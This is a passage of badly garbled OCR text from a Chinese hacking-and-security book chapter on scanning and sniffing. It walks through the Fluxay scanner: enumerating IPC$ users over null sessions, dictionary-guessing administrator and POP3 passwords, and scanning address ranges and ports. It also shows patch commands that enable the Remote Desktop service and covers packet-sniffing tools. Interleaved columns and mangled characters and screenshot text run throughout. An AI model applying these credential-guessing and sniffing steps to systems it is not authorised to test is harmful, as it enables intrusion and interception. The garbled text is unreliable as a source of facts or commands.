step 贺 单 去 “打开 Result” 按 钮 ， 即 可 以 记 
事 本 的 形式 打开 Result 记事 本 文件 ， 在 其 
中 即 可 看 到 具体 的 扫描 信息 ， 如 下 图 所 示 。 


5.2 扫描 目标 系统 的 其 他 信息 


除 扫描 目标 系统 的 端口 信息 外 ， 还 可 
以 扫描 目标 系统 的 其 他 信息 ， 如 目标 主机 
的 IPCS 用 户 列表 、 指 定 地 址 范围 内 的 目标 
主机 信息 等 。 


色 招 5: 扫描 目标 主机 的 IPC$ 用 户 列 表 


IPC$ (Internet Process Connection) 是 
共享 “命名 管道 ”的 资源 ， 是 为 了 让 进程 
间 通 信 而 开放 的 命名 管道 ， 可 以 通过 验证 
用 户 名 和 密码 获得 相应 的 权限 ， 在 远程 管 
理 计算 机 和 查看 计算 机 的 共享 资源 时 使 用 。 
利用 IPCS 可 以 与 目标 主机 建立 一 个 空 
的 连接 ， 利 用 这 个 空 的 连接 ， 连 接 者 可 以 获 
得 目标 主机 上 的 用 户 列表 ， 通 过 猜测 密码 
或 者 穷 举 密码 ， 从 而 获得 管理 员 权 限 。 利 
用 “流光 扫描 器 ”探测 目标 主机 的 IPCS 用 
户 列表 的 具体 操作 步骤 如 下 。 
fstep 回 在 “流光 扫描 器 ” 主 窗口 中 选中 
“IPCS$ 主机 ” 复 选 框 ， 然 后 右 击 ， 在 弹出 
的 快捷 菜单 中 选择 “编辑 ”一 “添加 ”选项 ， 
如 下 图 所 示 。 


冯 r+- [jot5.0) Build 3310 0 用 户 ) - 0O x 
| 文才 有 妃 (E) 吾 着 V) 经 (R) 远大 (O) 工具 大 隐 H) 关于 A) 
Re 了 


第 5 章 ”目标 系统 的 扫描 与 网 络 数据 的 嗅 探 = 


添加 主机 (NT Serven 


|192.168.0.105 加 


国 使 用 自动 完成 功能 多 
| 确定 (0) | | 取消 O 

step 图 选中 刚刚 添加 的 IPCS 主机 ， 然 后 右 
击 , 在 弹出 的 快捷 菜单 中 选择 “探测 ”一 “ 探 
测 IPCS 用 户 列表 ”选项 ， 如 下 图 所 示 。 


- oO 


国 自动 更 新 主机 列表 @) 


[Eee 国 打开 “IPC 自动 探测 ”对 话 框 ， 提 示 
用 户 “ 是 否 在 成 功 获得 用 户 名 后 立即 开始 
简单 模式 探测 ”信息 ， 如 下 图 所 示 。 


1PC 写 动 探测 


是 否 在 成 功 获得 用 户 名 后 立即 开始 简单 模式 探测 ? 


口 仅 探 则 Administrators 组 的 用 户 
口 当 探 玫 到 一 个 Administrators 时 ,线程 即 告 结束 
| [mo | [Cav Ew | 


Ba 图 单 主 “ 选 项 ”按钮 ， 在 打开 的 “用 记 
列表 选项 ”对 话 框 中 进行 设置 , 如 下 图 所 示 。 


用 户 列表 选项 


口 列 出 主机 中 所 有 用 户 


| 用户 [二 


[step 图 打开 “添加 主机 (NT Server)” 对 话 框 ， 
在 其 下 拉 列 表 框 中 输入 要 扫描 主机 的 人 地 
址 (这 里 以 192.168.0.105 为 例 )， 如 下 图 
所 示 。 


最 多 列 出 [2 司 个 用 户 


因 如 果 主 机 不 允许 列 出 用 户 则 强制 从 以 下 文件 导入 


文件 名 : |C:Program FiesVFuxayWPCListINE | 浏览 回 


[eo 国 单 去 “确定 ”按钮 ， 程 序 开始 自动 探 
测 目标 主机 ， 如 下 图 所 示 。 
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[step 图 单 击 “下 一 步 ” 按 钮 ， 弹 出 POSTS 
对 话 框 ， 在 该 对 话 框 中 可 以 对 要 扫描 的 端 

口 范围 进行 设置 , 这 里 选中 “标准 端口 扫描 ?” 
复 选 框 ， 如 下 图 所 示 。 


PORTS 


FLUXAY 5.0> 正 在 连接 主机 192.168.0.105 


锣 绝 招 6: 扫描 指定 地 址 范围 内 的 目标 主机 
使 用 “流光 扫描 器 ”的 高 级 扫描 向 导 ， 
可 以 快速 地 对 指定 地 址 范围 内 的 目标 主机 ee 
进行 扫描 ， 其 具体 操作 步骤 如 下 。 
[Ba 在 “流光 扫描 器 ” 主 窗口 中 选择 “ 文 QQ QQ 


6 间 


件 ” 一 “高 级 扫描 向 导 ” 选 项 ， 如 下 图 所 示 。 


A am Co < 上 一步 (8) | 下 一 步 IN) > | | | 
CD Ena 

Bano. co 

日 xmara 


[step 图 单 去 “下 一 步 ” 按 钮 ， 打 开 POP3 对 
话 框 ， 在 该 对 话 框 中 可 以 对 POP3 检测 项 目 
pe 这 里 选中 “获取 POP3 版 本 信息 ” 
“尝试 猜 解 用 户 ” 复 选 框 ， 如 下 图 所 示 。 


ne 


i pors 
Ey 打开 “设置 ”对 话 框 ， 在 “起 始 地 址 ” ee 
“结束 地 址 ”文本 框 中 分 别 输 入 指定 地 
aa 的 开始 和 结束 IJ 地 址 ， 并 选中 “ 获 
取 主 机 名 ”和 “PING 检查 ” 复 选 框 ， 如 下 
图 所 示 。 
设置 
et 150 
ps De < 上 一 步 (B) | 下 一 步 (N) > | 
atss: |AL EE 
国 守 Re 国 PING 权 要 
二 Eee 图 依次 单 去“ 下 一 步 ” 按 钮 ， 打 开 
3 IPC 对 话 框 ， 在 该 对 话 框 中 可 以 对 IPC 检 
ED 测 项 目 进行 设置 ， 这 里 取消 选中 的 “ 仅 对 
EE x Administrators 组 进行 猜 解 ” 复 选 框 ， 如 下 
图 所 示 。 
[sm:| 
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因 们 连接 (NULL Session} 扫 多 
EB 

因 将 坛 B 职 用户 名 

国 兰 试 z4 忆 职 的 用 户 各 进行 多 


口 网 HAdministraotors 担 进行 雪 虞 


< 上 一 步 (B) | 下 一 步 (N) > 


step 较 依次 单 击 “ 下 一 步 ” 按 钮 ， 直 至 系统 
弹出 “选项 ”对 话 框 ,在 该 对 话 框 中 设置 “ 靖 
解 用 户 名 字典 ”“ 猜 解密 码 字典 ”和 “保存 
扫描 报告 ”的 保存 路 径 ， 如 下 图 所 示 。 


迁 项 x 


[EProgram Feopuoybede | 


保存 扫 关 报告: 


CAProgram Files\Fluxay\Reports\192.168.0.1-192 国 | 


#2 [100 习 | maEmO | 


< 上 一 步 (8) 玩 成 


step 园 单 击 “ 完 成 ”按钮 ， 弹 出 “选择 流光 
主机 ”对 话 框 ， 如 下 图 所 示 。 


选择 流光 主机 x 
主机 ENET ”Wo 党 D，[55 
用 户 名 [CHost 密 码 。 [ 户 

选项 


| 开始 | | 取消 O 


step 图 单 南 “开始 ”按钮 ， 程 序 开始 扫描 指 
定 的 地 址 范围 ， 这 可 能 需要 较 长 时 间 ， 在 
扫描 过 程 中 还 会 打开 探测 结果 对 话 框 提 示 


用 户 ， 如 下 图 所 示 。 


DO e2180 05 


DB sso ms 


| 站 | 堪 到 EE 


国 小 格 FM 证 :995-2007 小 检 作品 版 机 所 有 
E23 主机 


[EEC ba] 


铺 程 | 控 l 度 


和 侈 提示 : 扫描 完毕 后 ， 系 统 会 弹出 “注意 ” 
提示 信息 框 提醒 用 户 是 否 要 查看 扫描 报告 
单 击 “是 ”按钮 ， 此 时 会 打开 一 个 HIML 
格式 的 扫描 报告 ， 其 中 列 出 了 扫描 到 的 主 
机 的 详细 信息 。 


注意 


是 否 需要 查看 扫描 报告 ? 


绝招 7: 扫描 目标 主机 的 系统 进程 信息 


使 用 Windows 进程 管理 器 扫描 系统 中 Et 

的 进程 信息 并 对 系统 进程 进行 全 面 管理 ， 

其 最 大 的 特点 是 包含 了 几乎 全 部 的 Win- 
dows 系统 进程 和 大 量 的 常用 软件 进程 。 使 
用 Windows 进程 管理 器 扫描 系统 进程 的 具 
体操 作 步 又 如 下 。 

[step 加 下载 并 解压 缩 “Windows 进程 管理 器 ” 
软件 ， 其 中 包含 4 个 文件 ， 如 下 图 所 示 。 
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EL 

国 dbmdb 

夏 pcMoreme 
区 vserdbmdb 


国 此 电脑 

较 识 各 

加 到 1 

图 并 

汪 便 

小 二 

CD] 
Windows10 (CY 


4 个 四 目 入 中 1 人 0 晶 144 MB 


EE 
Eee 国 双击 “补丁 ”文件 夹 ， 打 开 “ 补 丁 ” 
文件 夹 ， 在 其 中 可 以 看 到 Windows 进程 管 
理 器 的 补丁 程序 和 补丁 说 明文 件 ， 如 下 图 
所 示 。 


加 | 回国 *|#J - D x 
EI :mr := 5 © 


¢ + » prom, Pang » NT 5 


和 z ” sm 
汪 快 囊 沪 问 
图 prcMgrPatchexe 训 
人 | WTimmgoe | 
ET 
图 视 史 
加 图 片 
图 并 
4 
小 再 
国 = 
Windows10 (CY) 
本 地 辜 盖 (D:) 
PE A 
李志民 天 (F] ve 
2 个 顶 目 


[step 图 双击 补丁 程序 ， 打 开 “Windows 进程 
管理 器 补丁 程序 ”对 话 框 ， 在 其 中 显示 补 
丁 介 绍 以 及 详细 信息 ， 如 下 图 所 示 。 


Windows 进程 管理 器 补丁 程序 x 
-补丁 介 细 


有 
详细 信 


信息 

regsvr32 /s WSystemRootW\system32\comctl32. 四 1” 
regsvr32 /s WSystemRoot%\system32\COMCTL32. OCX” 
regsvr32 /s WGystemRoot%\system32\dao360. dll” 
regsvr32 /s WSystemRoot%\system32\NSCOMCTL OCX” 
se config TermService start= AUTO 

Jet Start TermService 


Wuw. jpexe com 


户 补丁 应 用 成 功 ， 如 下 图 所 示 。 


提示 x 


6 补丁 应 用 成 功 


[ep 图 单 去 “确定 ”按钮 ， 关 闭 “ 提 示 ” 对 
话 框 。 双 击 “Windows 进程 管理 器 ”启动 
程序 ， 打 开 “Windows 进程 管理 器 ”窗口 ， 

如 下 图 所 示 。 其 中 显示 了 系统 当前 正在 运 
行 的 所 有 进程 ， 与 “Windows 任务 管理 器 ” 
窗口 中 的 进程 列表 是 完全 相同 的 。 


用 Windows mea 一 日 % 
pm En Es en 
二 口 咎 pe 寺 得 门 并 机 自动 沼 行 门 商 吕 四 机 
全 swaa 的 sse 司 nx 国 saBt 到 xmas 的 mn 国 teri [Tm 
ET - ME I lk I 开 ~ 


外 
名 
名 
加 
名 


ET TE TT TP] 


[See 国 在 列表 中 选择 其 中 一 个 进程 选项 ， 单 
击 “ 描 述 ” 按 钮 ， 即 可 看 到 该 进程 的 详细 
信息 ， 如 下 图 所 示 。 


me foes em 


Wo wa 
Fags wap Qn sao 

是 种 所 交口 芝 而 Fn 门 忆 动车 藻 堪 门 开机 自动 二 行 门面 品 委 后 
全 tra 全 ssai 到 Mth 司 于 出 本 Hes 国 Bipik tee 


3 ssssssanssssss:sssssss 


[step 较 单 击 “ 应 用 补丁 ”按钮 ， 即 可 应 用 补 
丁 程序 ， 并 弹出 “提示 ”对 话 框 ， 提 示 用 
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[Eee 车 单 击 “ 模 块 ”按钮 ， 即 可 查看 该 进程 
的 进程 模块 ， 如 下 图 所 示 。 


国 Windons is Er 
Pia EE) ES) 
Dmsepae ANSE DE 


本 四 


i 


~ A | | 


[TT TT WE 几 下 TD 一 类 大 村 SEO 


step 国 在 进程 列表 中 右 击 某 个 进程 ， 在 其 中 
可 以 对 进程 结束 、 暂 停 、 查 看 属性 、 删 除 
文件 等 操作 ， 如 下 图 所 示 。 


Flea ip ECs) OD 
二 WSM 。 惠 了 


Dm Apal ANANSI HCE 


[ET 


ma sen gi Rt Me nl tEiil 
-一 人 


Vm Nin ORE We ep ~ AR Tr jn ees 


斧 提 示 : 按 进 程 的 安全 等 级 进行 了 区 分 。 
@ 黑色 表示 的 是 正常 进程 (正常 的 系统 或 
应 用 程序 进程 ， 安 全 ); 

@) 蓝 色 表示 可 疑 进程 (容易 被 病毒 或 木马 
利用 的 正常 进程 ， 需 要 留心 ); 

图 红色 表示 病毒 & 木马 进程 (危险 )。 


5.3 ” 嗅 探 网 络 中 的 数据 信息 


网 络 嗅 探 是 利用 计算 机 的 网 络 接口 截 
获 计算 机 数据 报 文 的 一 种 手段 。 网 络 嗅 探 
的 基础 是 数据 捕获 ， 网 络 嗅 探 系统 是 并 接 
在 网 络 中 来 实现 对 数据 的 捕获 ， 这 种 方式 
和 入 侵 检测 系统 相同 ， 因 此 被 称 为 网 络 
嗅 探 。 
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绝招 8: 嗅 探 网 络 中 的 TCP/IP 数 据 包 


使 用 SmartSniff 可 以 嗅 探 网 络 适配器 的 加 
TCP/IP 数据 包 ， 并 且 可 以 按 顺序 查看 客户 
端 与 服务 器 之 间 会 话 的 数据 。 具 体 的 操作 
步骤 如 下 。 

[Step 加 单 击 桌 面 上 的 SmartSniff 程序 图 标 ， 
打开 SmartSniff 程序 主 窗 口 ， 如 下 图 所 示 。 


加 smartsniff 一 口 X 
文件 (有 ”六 纺 ({E) 视图 (V) 远 项 (O) 帮助 (H) 
本 | 平生 | 口 回 红 

村 81 。 ”协议 。 ”本 地 地 址 远程 地 址 


本 地 洲 口 远程 湛 口 


单 击 “ 开 始 捕 提 ”按钮 或 按 F5 键 ， 
开始 捕获 当前 主机 与 网 络 服务 器 之 间 传 输 
的 数据 包 ， 如 下 图 所 示 。 

加 smartsniff 一 口 x 


文件 (各 久 (E) 视图 (V) 远 项 (O) 部 助 (H) 
> 图 | 科 从 | 门 回 站 


案 引 协议 本 地 地 址 远程 地 址 本 地 沪 口 远 种鱼 口 人 
91 UDP 192.168.0.105 123.151.78.54 。 4022 8000 

© 2 Tp 192.168.0.105 125.88.219.247 3255 443 

@3 TcpP 192.168.0.105 180.149.131.35 3388 443 

@4 TCP 192.168.0.105 180.149.131.35 3389 443 

和 5 TCp 192.168.0.105 。 125.77.198.152 53891 80 


已 经 畏 区 27 个 数据 包 


[step 图 单 击 “ 停 止 捕 获 ” 按 钮 或 按 F6 键 ， 
停止 捕获 数据 ， 在 列表 中 选择 任意 一 个 
TCP 类 型 的 数据 包 ， 即 可 查看 其 数据 信 
息 ， 如 下 图 所 示 。 
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| 一 smarsni -0 
| EN iso am 

> 入 | 品目 电站 

EE Et ea] ER | 
®37 Upp 1921580106 1921580255 138 1 bgsaropscve- 
@38。 Upp 1921530105 1835016208 5000 aooo pDEsaop5rNa_ 
39 upp e21640105 e14720144 so aooo DEscrop-arNa_ 
@4 Tp 。 19216580105 12575247199 3421 0 DESKTOP 57NQ 
O41 Tp 1921630105 12576247199 3423 60 DESKTOP-57NO.. 
.| 

O43 TCP 1921530105 120.5588244 3511 a DESXTOP-57NO~ vw 
O00000 CA 6F 0 09 00 01 00 00 G0 00 08 0 03 77 77 17 0. .~ 
ono019 99 77 65 69 61 6D 6D 55 72 ga 59 5E 900 09 01 99 .wehanne r.cn 


gonge2z9 ot 


seaeuae 
assete 


CA 6F 81 89 09 01 em ey g0 Oo 90 09 77 77 77 .0.. 
8 77 65 69 61 6D 6D 65 72 02 53 6E 08 89 0 ea 


时 届 个 CP/IP 会 已 泽 1 个 


罗 在 列表 中 选择 任意 一 个 UDP 类 型 的 
数据 包 , 即 可 查看 其 数据 信息 , 如 下 图 所 示 。 


| Smansnif - oOo x 


节 二 
D059 
口 尽 -X- 忆 由- 四- 


川 区 


© ms 加 
© OO gfleyWDy3650 字 全 测 千 


i 


运程 主机 


ins. xj tslaccm com 


绝招 9: 嗅 探 网 络 中 的 上 下 行 数据 包 
《网 络 数据 包 嗅 探 专家 》 是 一 款 监视 网 


交 件 (有 |” 丹 蜡 (E) 视图 [Vi 迄 顶 (O) 帮助 (H) 
> 四 和 | 口 园 有 外 站 Yi 
en | 络 数据 运行 的 嗅 探 器 ， 能 够 完整 地 捕捉 到 
CA 138 Escrop-scve 所 处 局 域 网 中 所 有 计算 机 的 上 行 、 下 行 数 
@39 UDP 1921680.105 。 11914720144 5001 8000 DESKTOP-S7NO.. 
2 E22 | 据 包 ， 具体 的 操作 步 又 如 下 。 
i oo 打开 《网 络 数据 包 噢 探 专家 》 程 序 ， 
< > 
a 其 工作 界面 如 下 图 所 示 。 
0 01 E3 34 E2 39 BB 56 
Dn 66 BN 39 DD EF AE Nc Te ee 
ee CT EL ET 
1 bn 的 i v & [本 $ 过 ET EE EW LOE Er 
并 币 个 CPAP 全 和 已 3 本 1 个 
在 列表 中 选中 任意 一 个 数据 包 ， 选 择 
“文件 ”一 “属性 ”选项 ， 在 弹出 的 “ 属 |. 
性 ”对 话 框 中 可 以 查看 其 属性 信息 ， 如 下 人 Mele nee] Er Er 
Ee 
图 所 示 。 
属性 x 
案 引 : Be J 
协议 : [upp 
本 地 地 址 : 192.168.0.105 Ee [eT | 
远程 地 址 : 183.60.16.208 则 关于 电热: 5。 王 和 |: 0 部 和 正 用 送 : 0 部 节 网 ww Leray rm 【永恒 络 工作 宏 ] 为 帮 人 
本 地 端 D: [5000 
远程 端口: |D000 站 Fy bs > 
本 地 主机 : [DESKTOP-67NQBIF.DHCP HOST Etep 四 单 击 开始 嗅 探 按钮 ， 开始 捕获 当 
人 前 网 络 数据 ， 如 下 图 所 示 。 
Rex: 字 节 1 画 - 一 sade 
小 : BEE EXE SR 
区 a 
捕 闭 时 则 : 201 8/15 18:39:29:856 cnc 四 
最 后 包 体 时 间 : [201718115 18:39:29:966 se 
进程 1D: [ pe EF 
进程 文件 名 : Vd 上 = 
进程 用 户 : | rc 了 
加 载 MAC 地 址 : pe 有 
远程 MAC 地 址 : | PE Ee EP | 
本 地 IP 国 党: ET 
远程 IP 国 罕 和 的 寺 址 


step 园 在 列表 中 选中 任意 一 个 数据 包 ， 选 择 
“视图 ”一 “网 页 报告 -TCP/IP 数据 流 ” 选 
项 ， 即 可 以 网 页 形式 查看 数据 流 报告 ， 如 
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EE EE 
了 部 二: 395 。 正和 : 103 字 节 


EE 
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[Ep 图 单 去 “停止 嗅 探 ” 按钮 ， 停 止 捕获 数 | 绝招 10: 嗅 探 网 络 中 流 过 网 卡 的 数据 


据 包 ， 当 前 的 所 有 网 络 连接 数据 将 在 下 方 使 用 《网 络 嗅 探 器 〈 影 音 神 探 )》 可 以 
人 嗅 探 流 过 网 卡 的 数据 并 智能 分 析 过 滤 ， 从 


下 aa 二 二 ”| 而 快速 找到 所 需要 的 网 络 信息 ， 如 音乐、 

| 视频 、 图片、 文件 等 , 具体 的 操作 步骤 如 下 。 
[step 图 启动 《影音 神探 ) ， 将 会 看 到 程序 将 
测试 所 有 网 络 适 配器 提示 框 ， 如 下 图 所 示 。 
boformetion, | 电气 yj 


Ei 首次 运行 程序 ， 或 者 网 络 适配器 配 置 模 误 ， 程 序 检 全 测试 所 有 网络 适 本 器 1 


| 


| me | 


step 图 单 击 OK 按钮 ， 即 可 打开 “设置 ”对 
| 话 框 ， 并 开始 测试 网 络 适配器 是 否 可 用 ， 
[ep 图 单 去 “IP 地 址 连接 ”按钮 ， 将 在 上 方 ”如 下 图 所 示 。 

窗 格 中 显示 前 一 段 时 间 内 输入 与 输出 数据 | 
的 源 地 址 与 目标 地 址 ， 如 下 图 所 示 。 ma 


俐 十 大 出 制 [ 国 二 这 
DELEEREIEORROSECE3EE 


内 网络 包间 后 雪 家 2019 o 
[UI 下 一 二 


口 Adapter for generic dialup and..， ‘DeviceWWPF_Ge..， 正在 测试 
口 Atansic L2 Fast Ethernet Cont... ‘Device\WPF _{6, 


6 
be 393,169.0.135 104.19.13€.151 -i3134 3 
EEC 
加 3 99 | 
日 的 地 址 
测试 网 站 : baidu.com 取消 


\ 


[sep 图 如 果 计 算 机 的 网 络 适 配器 符合 测试 要 
求 ， 则 会 看 到 “当前 网 络 适配器 可 用 ， 是 
否 它 作 为 缺 省 适配器 ”提示 信息 ， 如 下 图 
所 示 。 


EL | 


i) 当前 网 络 适 配器 可 用 ， 是 否 它 作为 缺 省 适配器 ? 


| mm 


Step 加 单 击 OK 按钮 , 返回 到 “设置 ”对 话 框 ， 
此 时 即 可 看 到 标识 为 “可 用 ”的 网 络 适 配 
已 经 被 选中 ， 如 下 图 所 示 。 


同志 贡 ;四 | 让: 169 京 有 | 正大 天 :| 训 和 


单 击 “ 网 页 地 址 嗅 探 ” 按 钮 ， 即 可 查 
看 当前 所 连接 网 页 的 详细 地 址 和 文件 类 型 ， 
如 下 图 所 示 。 


天 十 六 进 制 | 国 文 站 大 容 


EEC EEC 


| 
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Ci Er 


| 二 指定 网 站 61147761280 ~ 数据 包 类 型 
口 sdsapter for generic dislup and.，iDeviceWPF_Ge ， 不 可 用 也 含 字 符 素 数据 包 方向 ”所 有 本 
回 AtansicL2 Fast Ehernet Cort DeviceiWPF_{5.. 可 用 数据 包 长 席 ， 至 少 囊 
区 -| 
Pe a Bee 加 “网络 响 探 器 ”工具 有 “获取 URL” 
0 和 “列举 数据 包 ” 两 种 模式 ， 其 默认 的 模 
LL 冯 ] | 式 是 “获取 URL” 模式 。 在 “网 络 嗅 探 器 ” 


单 击 “ 确 定 ”按钮 即 可 完成 对 网 络 适 ， 主 窗口 中 选择 “ 嗅 探 ” “工作 模式 ”一 “ 列 
配器 的 设置 ， 并 打开 如 下 图 所 示 的 主 窗口 。 ” 举 数 据 包 ”选项 ， 即 可 将 其 模式 设置 为 “ 列 


a 泊 图 
CT 举 数 据 包 ”模式 ， 如 下 图 所 示 。 
出 皖 !c 列 诅 人 |， 设 秆 0 者 助 员 ) 
| 但 | 久 机 Re 
ET AE 有 小 化 到 几 上 
| aaa I | 
. hitp-Amg2 imgtn_bdimg.corybu=2720650682,4014236878&fm 
[a FM- htp /fm mgt bdimg cemyur380655787932335160718f 
图 片 文件 本 机 -后首 。 hipyimgs ingh btimg combur2501350116 10148928296f 
图 片 文件 本 机 一 -和 络 hitp./mg2 imgtn.bdimg.cenybus2143652777,14595797998fm 
图 片 文件 本 机 一 一 网络 htpyimg5 imgtn_bdimg.coryblu=530090170,180313065184mn 
图 片 文件 本 机 -网 洛 。 tpymgs nghbdmy cemybur38718032727216139718hmv 
图 文件 本 机 网 阁 。。 napynmge mgt vomg comvwus2390531497 35+6141956 mmm 
图 上 文件 本 机 -网 次 。 nap mgs gb vamg conyvun2798844e53107632Ss328M 
图 片 文件 本 机 网络。 hap ng mgt Dam coryVuz736310300,18463325408 mh 
图 上 文件 本 机 一 网站 。 htpyng5ingh pding cemyyvr4c410302.1904501358fmea 
图 文件 本 机 一 -网络 htpJfmgo inghn blimg cow-410575221 25672054056 im 
图 文件 本 机 一 网络 htp/mgetet baidu com4gHPbperpegeturnteurr18pienum 
9 E ， 图 片 文件 本 机 -向 洛 。 htpyinagebaidu conlpvpv2.917Wcuf 88qr%ES%SBWEEM 
| 关 高: 他 止 控 当前 工作 核 式 廊 现 UAL 振 电 括 汪 虹 涛 家 富 万 Fwww wes ce | Fe 村 - 培 http imgstat baidu com/4 gif7iogids107214566569209342985 
记 htp mg haetate camyatatcyssarshrgsuliwdgetiyear 
上 Fe 禁 - 党 hitp /mostat baidu Com17. pt 
« 人 E ep fimostet pad comys orp_cevrpc&sameleksyginterva 
选择 “ 噢 探 ” 一 “开始 嗅 探 ”选项 或 多 TI - 
1 
站 » 状态 信 目 蚁 乏 模式 了: wt 
ey 的 “开始 嗅 探 ” 按 钮 点 ， 即 EE 


可 进行 嗅 探 ， 并 将 嗅 探 到 的 信息 显示 在 下 [stp 图 如 果 想 分 类 显示 嗅 探 出 的 数据 包 ， 则 
面 的 列表 中 ， 如 下 图 所 示 。 在 “网 络 嗅 探 器 ” 主 窗 口中 的 “数据 包 ?” 


| 一 一 一 本 可 | 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “分 
[mo 于 设置 @) 击 由 本 ， 
@e 盆 | 加 类 查看 ”一 “图 片 文件 ”选项 ， 即 可 只 显 
开始 明生 | 人 上 上 史 控 | 设置 | 最 小 化 退出 紧 示 式 的 数 如 所 示 
ET | 井下 研 有 基文 人 | 图 片 形式 据 包 ， 如 下 图 所 示 。 
一 0 = 

图 文件 和 [二 

图 H 文 件 本 机 网络 。 htpyims2 delite comretateleommonwdaetshtuimagesel [Tr 

Fr Pe bttplimg2 bdstatic com'static/common/widget’shtu/mages/m 

tp baatete cominghmegelhtyfemghpoadpg 

文 4 文件 Est ee 9 全 © 全 他 包 一 1 

Er i Secor 开始 坟 控 信 上 星 控 ”设置 。 最 | 化 | 退出 必 

图 片 久 件 本 机 一 一 网 引 | 

图 片 文件 本 机 一 一 网 络 Http img2.bdstatic.comistaticlsearchresulimenoading_circle| 

图 上 文件。 本 机 一 网络。 Hpyimestatbedu con3giPoxuenrz%ES%36%ABESET%R | 

国有 文件 本 机 一 网络。 ttpling2 imatnbdmg comauz657811299.2357857278fmr2 

图 文件 。。。 本 机 网络。 htplins2 matnbdmg comau=2720850362 0142363788fm 

图 H 文 件 。。。 杰 机 一 网 络 ttpJine2 matn bdma comyN=3806557979 22335160718fm 

图 文件。 本 机 一 网 络 ttpJines matn bm comb-2501350116 10748523298f 

图 文件 本 机 一- 网络 。 htplins2 mgtnbdmg comau=2143662777 14595797998fm 

图 片 文件 本 机 一 一 网 络 tpVWimes jimgtn bdimg.corvibu-s30090170,18031306s18fm- | | 

图 文件。 本 机 网络。 rtp /mes mgmbam comyv-387180327272113c7iafp- | 

加 文件。 相机 -网 。 pymgtingnbamaeomur2o0S1G37 esto saa mm 

二 [TITLE 

Ce 3 > ~ i 
step 园 在 “网 络 嗅 探 器 ” 主 窗 口中 选择 “ 嗅 多 
一 
探 ” “过 滤 设 置 ”选项 ， 即 可 打开 “ 数 | 秆 -基站 香 宝 全 全 区 2 ，- 
二 EE TREEETRE CE 

据 包 过 滤 设 置 ”对 话 框 ， 如 下 图 所 示 ， 在 = ME 


其 中 即 可 对 指定 网 站 的 数据 包 进 行 过 滤 。 [Se 国 如 果 想 查看 文本 文件 的 数据 包 ， 则 需 
在 弹出 的 快捷 菜单 中 选择 “分 类 查看 ”一 “ 文 
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本 文件 ”选项 ， 即 可 只 显示 文本 文件 形式 


的 数据 包 ， 如 下 图 所 示 。 


网 妾 移 探 秋 (影音 神探 V5.5 


| 大 和 D 环 山石 加 基 由 


四 | 全 | 龟 | 外 一 


了 6 咱 探 ， 信 上 嘛 最 小 化 | 退出 


后 例 | 唱 控 当前 工 作 异 式 辽 扣 un.] 让 器 晶 兴 神 后 方 网 站 www ve 


[step 图 如 果 想 要 查看 某 个 数据 包 的 信息 ， 则 
在 “网 络 嗅 探 器 ” 主 窗 口中 的 “数据 包 ?” 
列表 中 选中 该 数据 包 后 ， 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “查看 数据 包 ” 选 项 ， 即 
可 打开 “数据 包 相 关 信 息 ” 对 话 框 ， 在 其 
中 即 可 看 到 选中 数据 包 的 详细 信息 ， 如 下 
图 所 示 。 


数 蜂 包 相关 信息 ~ 


显示 十 六 进 利文 市 EI. 


“流光 扫描 器 ”是 一 款 非常 出 名 的 中 文 
多 功能 专业 扫描 器 ， 其 功能 强大 、 扫 描 速 
度 快 、 可 靠 性 强 ， 为 广大 计算 机 黑客 迷 们 
所 钟爱 。 

“流光 扫描 器 ”可 以 探测 POP3、FTP、 
HTTP、PROXY、FROM、SQL、SMTP 和 
IPC 等 各 种 漏洞 ， 并 针对 各 种 漏洞 设计 不 同 


第 5 章 ”目标 系统 的 扫描 与 网 络 数据 的 噢 探 = 


的 破解 方案 。 其 主要 功能 如 下 。 
e 用 于 检测 POP3/FTP 主机 中 的 用 户 


密码 安全 漏洞 。 
。 多 线程 检测 ， 用 于 消除 系统 中 的 密 
码 漏洞 。 


e 高 效 的 用 户 流 模式 。 
e 高 效 的 服务 器 流 模式 ， 可 以 同时 对 
多 台 POP3/FTP 主机 进行 检测 。 
e 最 多 500 个 线程 探测 。 
e 线程 超时 设置 ， 阻 塞 线程 具有 自杀 
功能 ， 不 会 影响 其 他 线程 。 
e 支持 10 个 字典 同时 检测 。 
e 检测 设置 可 以 作为 项 目 保 存 ， 
下 次 继续 调用 。 
利用 “流光 扫描 器 ”可 以 轻松 探测 目 
标 主机 的 开放 端口 ， 下 面 将 以 探测 POP3 主 
机 的 开放 端口 为 例 进行 介绍 。 
[Sep 国 单 击 桌 面 上 的 “流光 扫描 器 ”程序 图 
标 ， 启 动 流光 扫描 器 ， 如 下 图 所 示 。 


让 Ri.0】 Bud 3310 [OR 


以 便 


上 == 出 户 外 Ei 和 硬度 

[step 图 选择 “选项 ”一 “系统 设置 ”选项 ， 
打开 “系统 设置 ”对 话 框 , 对 优先 级 、 线 程 数 、 
单词 数 / 线程 及 扫描 端口 进行 设置 ， 如 下 图 
所 示 。 


至 纹 设 置 
线程 设置 端口 
于 可 3 pop | 国 ”HmP 奇 
e | mr 
PROXY |8080 ”SQL 1433 


| 


优先 级 线程 熬 ”单词 数 / 钱 程 


| 确定 (0) | | BO | 


口 自动 户 整 线程 设置 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


step 图 在 扫描 器 主 窗口 中 选中 “HTTP 主 机” 
复 选 框 ， 然 后 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “编辑 ”一 “添加 ”选项 ， 如 下 图 所 示 。 


测 端口 的 范围 ， 如 下 图 所 示 。 


苦口 探 册 设置 
国 匠 二 勾 演 口 探 剂 范围 
范围 
探 出 端口 范围 从 [100 ”到 [po 


确定 (0) | | 取消 @ 〇 | 


step 园 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 开 


始 探测 目标 主机 的 开放 端口 ， 如 下 图 所 示 。 
| > | 


py 


国 es 
FD lo 


二 


Bep 轿 打开 “添加 主机 (HTTP)” 对 话 框 ， 
在 该 对 话 框 的 下 拉 列 表 框 中 输入 要 扫描 主 
机 的 人 地 址 (这 里 以 192.168.0.105) 为 例 ， 
如 下 图 所 示 。 


添加 主机 (HTTP) 


[192.168.0.109 


5| 
因 自动 更 新 主机 列表 但 ) 因 使 用 自动 完成 功能 @@ 


| 确定 (0) 」 | 取消 @Q 


此 时 在 主 窗口 中 将 显示 出 刚刚 添加 的 
HTTP 主机 ， 右 击 此 主机 ， 在 弹出 的 快捷 菜 
单 中 选择 “探测 ”一 “扫描 主机 端口 ”选项 ， 
如 下 图 所 示 。 


| 
